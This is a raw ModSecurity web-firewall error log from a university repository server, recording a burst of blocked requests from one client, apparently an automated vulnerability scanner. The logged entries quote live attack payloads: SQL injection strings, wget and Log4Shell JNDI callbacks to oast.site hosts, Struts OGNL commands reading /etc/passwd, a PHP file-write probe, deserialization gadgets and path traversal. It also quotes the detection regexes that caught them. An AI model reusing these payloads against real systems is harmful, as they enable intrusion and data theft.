[Tue Aug 29 11:34:49.297671 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAATlLEoAAAAq"]
[Tue Aug 29 11:34:49.323261 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAATTmSEAAAAV"]
[Tue Aug 29 11:34:49.333349 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAUXLiwAAABM"]
[Tue Aug 29 11:34:49.335578 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAUbg00AAABQ"]
[Tue Aug 29 11:34:51.575900 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAULx8IAAABD"]
[Tue Aug 29 11:34:52.308103 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAATTmSUAAAAV"]
[Tue Aug 29 11:34:52.320355 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11bMCo-f0AAATUxRAAAAAW"]
[Tue Aug 29 11:34:53.359310 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgr7wadpy1dpo81.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATZp6kAAAAf"]
[Tue Aug 29 11:34:53.360682 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAASI0EgAAAAG"]
[Tue Aug 29 11:34:53.373111 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAATmZd0AAAAr"]
[Tue Aug 29 11:34:55.315402 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAAUB018AAAA5"]
[Tue Aug 29 11:34:56.341666 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAShCZ0AAAAi"]
[Tue Aug 29 11:34:56.348438 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUCJeMAAAA6"]
[Tue Aug 29 11:34:57.332853 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAASPDM0AAAAS"]
[Tue Aug 29 11:34:57.353490 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAATzVI4AAAAx"]
[Tue Aug 29 11:34:57.400081 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ccCo-f0AAASPDM4AAAAS"]
[Tue Aug 29 11:34:58.324340 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAAVJXkQAAAAA"]
[Tue Aug 29 11:34:58.343560 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11csCo-f0AAAT2JQ8AAAAz"]
[Tue Aug 29 11:34:59.316890 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAATXLMQAAAAb"]
[Tue Aug 29 11:35:01.322027 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAVJXkkAAAAA"]
[Tue Aug 29 11:35:02.334089 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAASI0FMAAAAG"]
[Tue Aug 29 11:35:02.352520 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAAUNalYAAABF"]
[Tue Aug 29 11:35:03.309474 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUUZ88AAABK"]
[Tue Aug 29 11:35:03.328676 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAVRxcoAAAAQ"]
[Tue Aug 29 11:35:04.322756 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAAUUZ9EAAABK"]
[Tue Aug 29 11:35:04.332630 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAT9PPkAAAA1"]
[Tue Aug 29 11:35:05.320566 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgqaamkut3895yk.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11ecCo-f0AAATQXiYAAAAO"]
[Tue Aug 29 11:35:05.329324 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgc6g1ep3uohxww.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAVK0HwAAAAB"]
[Tue Aug 29 11:35:06.421048 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg5driu9kgt4zjh.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlg5driu9kgt4zjh.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAATWYSYAAAAa"]
[Tue Aug 29 11:35:07.324457 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAASPDNoAAAAS"]
[Tue Aug 29 11:35:07.343164 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAATQXioAAAAO"]
